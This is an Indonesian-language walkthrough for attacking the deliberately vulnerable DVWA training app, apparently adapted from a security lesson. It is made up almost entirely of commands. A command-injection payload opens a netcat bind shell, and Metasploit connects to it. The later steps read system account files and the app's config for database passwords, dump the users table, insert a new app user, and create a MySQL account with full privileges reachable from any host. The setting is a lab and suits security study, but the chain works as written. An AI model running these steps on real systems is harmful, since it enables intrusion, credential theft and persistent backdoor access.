DVWA: Exploit menggunakan Metasploit
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Siapkan NetCat
Masuk ke DVWA Command Injection, lakukan
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dimana 192.168.0.100 adalah IP address server DVWA
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.100 exploit
Cek password
whoami grep www-data /etc/passwd grep www-data /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/DVWA-1.9/config cat /var/www/html/DVWA-1.9/config/config.inc.php
Explorasi database, asumsi username MySQL root, password 123456
echo "show databases;" | mysql -uroot -p123456 echo "use dvwa; show tables;" | mysql -uroot -p123456 echo "use dvwa; desc users;" | mysql -uroot -p123456 echo "select * from dvwa.users;" | mysql -uroot -p123456
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -p123456 echo "use mysql; show tables;" | mysql -uroot -p123456
Ini bagian paling berbahaya, buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 echo "select * from mysql.user;" | mysql -uroot -p123456